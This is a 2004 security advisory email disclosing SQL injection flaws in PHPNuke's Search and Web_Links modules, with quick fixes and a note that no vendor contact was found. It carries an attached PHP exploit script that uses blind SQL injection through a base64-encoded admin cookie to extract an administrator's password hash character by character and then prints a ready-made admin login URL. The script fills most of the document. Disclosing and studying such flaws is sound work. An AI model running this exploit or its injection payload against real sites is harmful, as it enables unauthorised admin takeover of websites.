Date: Tue, 10 Feb 2004 12:32:10 +0800
From: pokley <[email protected]>
To: [email protected], [email protected]Subject: [SCAN Associates Sdn Bhd Security Advisory] PHPNuke 6.9 > and below SQL Injection in multiple module.
Cc: "[email protected]" <[email protected]>
------------smQGel0dKNLc2n2XZaJx5U
Content-Type: text/plain; format=flowed; charset=iso-8859-15
Content-Transfer-Encoding: 8bit
Products: PHPNuke 6.9 > (posibbly 7.x) (http://www.phpnuke.org)
Date: 10 February 2004
Author: pokleyzz <pokleyzz_at_scan-associates.net>
Contributors: sk_at_scan-associates.net
shaharil_at_scan-associates.net
munir_at_scan-associates.net
URL: http://www.scan-associates.net
Summary: PHPNuke 6.9 > and below (posibbly 7.x) SQL Injection in multiple
module.
Description
===========
PHPNuke is most popular content management system written in PHP with SQL
database
backend.
Details
=======
There is multiple SQL injection in multiple PHPNuke module which allow
attacker
to get "admin hash" and gain admin access to PHPNuke Website.
1) SQL Injection in Search module
---------------------------------
There is SQL injection in $category variable when performing search in
PHPNuke site.
This vulnerability have been disclose in "Hack In the Box Security
Conference 2003"
(http://hackinthebox.org) on (December 12th - 14th 2003). It is proofed
to be
exploitable in any version of MySQL database. The affected code is on line
168 in
in index.php from Search module.
167 if ($category > 0) {
168 $categ = "AND catid=$category ";
169 } elseif ($category == 0) {
One of the table which is selected in this "SELECT" query is nuke_authors
table. This can
be use to determine admin hash by guesting whether certain query is true
or false with search result for MySQL 3.
Quick Solution
--------------
Disable Search Module from Admin control panel.
2) SQL Injection in Web_links module
------------------------------------
Multiple function is vulnerable to SQL injection in $admin variable. This
encoded variable
is not sanitize after decoded to be use for SQL query. With crafted query
user can guest
admin hash with the available of "edit" link if the query is success.
Proof of concept is
provided for this vulnerability. It's required at least one link in
Web_Links module for
exploitation to be success.
Quick Solution
--------------
Disable Web_Links Module from Admin control panel.
Vendor Response
===============
We have try our best to get vendor contact but seem not found any security
contact. :-)
------------smQGel0dKNLc2n2XZaJx5U
Content-Disposition: attachment; filename="The_First_Cut_Is_The Deepest.php"
Content-Type: application/octet-stream; name="The_First_Cut_Is_The Deepest.php"
Content-Transfer-Encoding: 8bit
#!/usr/bin/php -q
PHPnuke 6.x and 5.x fetch author hash by pokleyzz <pokleyzz at scan-associates.net>
(Web Links module)
<?php
/*
# PHPnuke 6.x and 5.x fetch author hash by pokleyzz <pokleyzz at scan-associates.net>
# 3rd January 2004 : 9:29 a.m
# (Web Links module)
#
# bug found by pokleyzz (3rd January 2004 )
#
# Requirement:
# PHP 4.x with curl extension;
#
# Greet:
# tynon, sk ,wanvadder, sir_flyguy, wxyz , tenukboncit, kerengga_kurus ,
# s0cket370 , b0iler, syscalls and ...
#
# Happy new year 2004 ...
#
# ----------------------------------------------------------------------------
# "TEH TARIK-WARE LICENSE" (Revision 1):
# wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a "teh tarik" in return.
# ----------------------------------------------------------------------------
# (Base on Poul-Henning Kamp Beerware)
#
#
*/
if (!(function_exists('curl_init'))) {
echo "cURL extension required\n";
exit;
}
ini_set("max_execution_time","999999");
$matches = "admin\.php\?op=LinksModLink";
//$url = "http://127.0.0.1/src/phpnuke441a/html";
$charmap = array (48,49,50,51,52,53,54,55,56,57,
97,98,99,100,101,102,
103,104,105,
106,107,108,109,110,111,112,113,
114,115,116,117,118,119,120,121,122
);
if($argv[1] && $argv[2]){
$url = $argv[1];
$author = $argv[2];
if ($argv[3])
$proxy = $argv[3];
}
else {
echo "Usage: ".$argv[0]." <URL> <aid> [proxy]\n\n";
echo "\tURL\t URL to phpnuke site (ex: http://127.0.0.1/html)\n";
echo "\taid\t author id to get (ex: god)\n";
echo "\tproxy\t optional proxy url (ex: http://10.10.10.10:8080)\n";
exit;
}
$module = "/modules.php?name=Web_Links&l_op=MostPopular";
$cookie = "admin={$admin}";
$ch = curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.$module);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
if (!ereg("name=Web_Links&l_op=visit",$res)){
echo "Not vulnerable. No link available\n";
exit();
}
echo "Take your time for Teh Tarik... please wait ...\n\n";
echo "Result:\n";
echo "\t$author:";
$admin = $author.":";
for($i= 1;$i< 33;$i++){
foreach ($charmap as $char){
echo chr($char);
$admin = ereg_replace("=","%3d",base64_encode("{$author}' and ascii(substring(pwd,$i,1))=$char/*:killu:killu"));
$cookie = "admin={$admin}";
$ch = curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.$module);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
//curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
$res=curl_exec ($ch);
curl_close ($ch);
if (ereg($matches,$res)){
//echo chr($char);
$admin .= chr($char);
break 1;
}
else {
echo chr(8);
}
if ($char ==103){
echo "\n\n\tNot Vulnerable or Something wrong occur ...\n";
exit;
}
}
}
$admin .= "::";
echo "\n\nAdmin URL:\n";
echo "\t$url/admin.php?admin=".ereg_replace("=","%3d",base64_encode($admin));
echo "\n";
echo "\n\nEnjoy your self and Happy New Year 2004....";
//if (eregi("^windows",$_ENV['OS'])){
// exec("explorer \"$url/admin.php?admin=".ereg_replace("=","%3d",base64_encode($admin))."\"");
//}
?>
------------smQGel0dKNLc2n2XZaJx5U--
